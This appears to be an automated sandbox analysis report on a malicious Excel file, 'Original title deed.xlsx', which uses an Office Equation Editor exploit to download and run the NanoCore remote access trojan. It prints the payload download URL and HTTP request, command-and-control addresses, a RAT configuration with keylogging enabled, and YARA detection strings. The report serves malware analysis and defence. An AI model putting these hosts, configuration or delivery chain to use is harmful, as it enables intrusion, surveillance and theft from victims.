Analysis Report Original title deed.xlsx

Overview

General Information

Sample Name: Original title deed.xlsx
Analysis ID: 402852
MD5: ef302d177adde99f0a6f2e8a6bc9eda1
SHA1: ebc1e702f7334f162571ae83a4810fd870766ee3
SHA256: caf4f0b64bd425c3e04a28606b54a98b4eed7deb03ca7091ad148fddfbc297a8
Tags: VelvetSweatshop xlsx

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Writes many files with high entropy
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2400 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2500 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2780 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
      • MSBuild.exe (PID: 2764 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
      • vbc.exe (PID: 2868 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
        • MSBuild.exe (PID: 2872 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
        • vbc.exe (PID: 2804 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
          • MSBuild.exe (PID: 2524 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
          • vbc.exe (PID: 2388 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
            • MSBuild.exe (PID: 3060 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
            • vbc.exe (PID: 1620 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
              • MSBuild.exe (PID: 552 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
              • vbc.exe (PID: 2272 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                • MSBuild.exe (PID: 1688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                • vbc.exe (PID: 1840 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                  • MSBuild.exe (PID: 620 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                  • vbc.exe (PID: 1192 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                    • MSBuild.exe (PID: 592 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                    • vbc.exe (PID: 2320 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                      • MSBuild.exe (PID: 2300 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                      • vbc.exe (PID: 1888 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                        • MSBuild.exe (PID: 2104 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                        • vbc.exe (PID: 2252 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                          • MSBuild.exe (PID: 2384 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                          • vbc.exe (PID: 2644 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                            • MSBuild.exe (PID: 2448 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                            • vbc.exe (PID: 2688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                              • MSBuild.exe (PID: 2544 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                              • vbc.exe (PID: 2404 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                                • MSBuild.exe (PID: 2324 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                                • vbc.exe (PID: 2444 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
                                  • MSBuild.exe (PID: 2472 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)
                                  • vbc.exe (PID: 2460 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": ".0.0.0,", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfcf5:$a: NanoCore
  • 0xfd05:$a: NanoCore
  • 0xff39:$a: NanoCore
  • 0xff4d:$a: NanoCore
  • 0xff8d:$a: NanoCore
  • 0xfd54:$b: ClientPlugin
  • 0xff56:$b: ClientPlugin
  • 0xff96:$b: ClientPlugin
  • 0xfe7b:$c: ProjectData
  • 0x10882:$d: DESCrypto
  • 0x1824e:$e: KeepAlive
  • 0x1623c:$g: LogClientMessage
  • 0x12437:$i: get_Connected
  • 0x10bb8:$j: #=q
  • 0x10be8:$j: #=q
  • 0x10c04:$j: #=q
  • 0x10c34:$j: #=q
  • 0x10c50:$j: #=q
  • 0x10c6c:$j: #=q
  • 0x10c9c:$j: #=q
  • 0x10cb8:$j: #=q
0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
24.2.vbc.exe.2760000.6.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
24.2.vbc.exe.2760000.6.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
24.2.vbc.exe.2760000.6.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
24.2.vbc.exe.2760000.6.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfef5:$a: NanoCore
  • 0xff05:$a: NanoCore
  • 0x10139:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0x1018d:$a: NanoCore
  • 0xff54:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x10196:$b: ClientPlugin
  • 0x1007b:$c: ProjectData
  • 0x10a82:$d: DESCrypto
  • 0x1844e:$e: KeepAlive
  • 0x1643c:$g: LogClientMessage
  • 0x12637:$i: get_Connected
  • 0x10db8:$j: #=q
  • 0x10de8:$j: #=q
  • 0x10e04:$j: #=q
  • 0x10e34:$j: #=q
  • 0x10e50:$j: #=q
  • 0x10e6c:$j: #=q
  • 0x10e9c:$j: #=q
  • 0x10eb8:$j: #=q
20.2.vbc.exe.2760000.6.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 172.245.45.28, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2500, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2500, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe, Avira URL Cloud: Label: phishing
Found malware configuration
Source: 24.2.vbc.exe.2760000.6.raw.unpack, Malware Configuration Extractor: NanoCore (same configuration as listed under Malware Configuration above)
Yara detected Nanocore RAT
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe, Joe Sandbox ML: detected
Source: 8.2.vbc.exe.2860000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 23.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 13.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.2.vbc.exe.2830000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 15.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.2.vbc.exe.2860000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 30.2.vbc.exe.2830000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 20.2.vbc.exe.27f0000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 28.2.vbc.exe.2940000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 24.2.vbc.exe.27f0000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 21.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 27.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 29.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 22.2.vbc.exe.2850000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 25.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 26.2.vbc.exe.27e0000.7.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.vbc.exe.30a0000.8.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 31.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.2.vbc.exe.1f10000.4.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 9.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.2150153409.0000000003270000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.2167801125.0000000002900000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.2179925246.00000000029C0000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.2191624487.0000000002860000.00000004.00000001.sdmp
Source: C:\Users\Public\vbc.exe, Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004059F0
Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040659C FindFirstFileA,FindClose,4_2_0040659C
Source: C:\Users\Public\vbc.exe, Code function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
Source: global traffic, DNS query: name: myhostisstillgood11.zapto.org
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 172.245.45.28:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: 79.134.225.26
Source: Malware configuration extractor, URLs: nassiru1166main.ddns.net
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Date: Mon, 03 May 2021 12:55:40 GMT; Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3; Last-Modified: Mon, 03 May 2021 07:04:16 GMT; ETag: "923fb-5c16791e13768"; Accept-Ranges: bytes; Content-Length: 599035; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
Source: Joe Sandbox View, IP Address: 172.245.45.28
Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
Source: global traffic, HTTP traffic detected: GET /dashboard/docs/images/nd.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: myhostisstillgood11.zapto.org; Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B44CEF.emf
Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown, DNS traffic detected: queries for: myhostisstillgood11.zapto.org
Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp, String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp, String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmp, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmp, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp, String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp, String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp, String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 0000000A.00000002.2202157989.0000000002B60000.00000002.00000001.sdmp, String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040548D

        E-Banking Fraud:

        Yara detected Nanocore RAT
        Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
        Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
        Source: Yara match File source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY

        Spam, unwanted Advertisements and Ransom Demands:

        Writes many files with high entropy
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office equation editor drops PE file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
        Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403461
        Source: C:\Users\Public\vbc.exe Code function: 4_2_00406925 4_2_00406925
        Source: Original title deed.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
